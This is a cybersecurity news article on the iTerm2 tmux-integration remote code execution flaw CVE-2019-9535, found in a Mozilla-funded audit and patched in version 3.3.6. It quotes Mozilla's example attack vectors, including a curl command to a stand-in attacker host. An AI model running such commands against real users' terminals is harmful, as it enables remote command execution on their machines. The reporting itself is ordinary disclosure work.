Darknet

7 Year-old RCE Vulnerability in macOS Terminal Emulator iTerm2 Let Hackers Execute Remote Command in Mac

Mozilla Researchers discovered a critical vulnerability in macOS Terminal Emulator iTerm2 allows attackers to connect with the SSH server to execute a command on the user’s computer.

iTerm2 terminal emulator is a replacement for macOS terminal and the successor of iTerm that supports macOS 10.12 or the newer version with a variety of features including window transparency, full-screen mode, Exposé Tabs, Growl notifications.

The critical vulnerability discovered during the source code security audit conducted by Mozilla researchers and it considers as a very critical security vulnerability that allows an attacker to execute commands on the victim’s machine by sending a specially crafted file.

The security audit conducted under Mozilla Open Source Support Program (MOSS) that continuously focusing to strengthen the open-source ecosystem and ensure its security.

“MOSS selected iTerm2 for a security audit because it processes untrusted data and it is widely used, including by high-risk targets (like developers and system administrators),” Mozilla said.

The critical vulnerability resides in the tmux integration feature of iTerm2 for the last 7 years and if the attacker can produce the output on the victim’s terminal let attacker possible execute malicious commands on the user’s Mac computer.

According to Mozilla, “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative example”.

In order to exploit the vulnerability, attackers need a user interaction which could be achieved by trick users to open a specially crafted file that they send via different mediums such as email or compromised websites.

The Vulnerability can be tracked as CVE-2019-9535 and Mozilla warns that” it can be exploited via commands generally considered safe there is a high degree of concern about the potential impact.”

The vulnerability has been fixed in version 3.3.6 and all users are strongly recommended to upgrade the new version to avoid future attacks.

You can follow us on LinkedinTwitterFacebook for daily Cyber Security and hacking news updates.

Balaji N

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Recent Posts

Hackers Target AI Infrastructure With RCE, Prompt Injection and API Key Theft

Hackers are actively probing AI systems, turning exposed gateways and agent tools into routes for…

3 hours ago

Hackers Make Phishing Pages Change Their Code Every Time Someone Opens Them

Hackers are making some phishing pages harder to track by changing the code delivered to…

3 hours ago

Iran-Linked Hackers Reportedly Knock UK Power Plant Offline for Four Days

A cyber incident reportedly forced a British power plant to halt operations for about four…

4 hours ago

Russian Hackers Use New HOOKEDGE Malware to Spy on European Defense and Diplomatic Targets

Russian hackers have used a new backdoor called HOOKEDGE to target defense manufacturers, government bodies,…

5 hours ago

Ransomware Gang Claims AI Can Analyze 700GB of Stolen Data Every Hour

TITAN ransomware is pairing file encryption with an ambitious claim: artificial intelligence that can sort…

5 hours ago

Hackers Compromise Hundreds of WordPress Sites to Deploy Amatera Stealer via ClickFix

A fake student resume is being used to place a remote-access tool on researchers’ Windows…

6 hours ago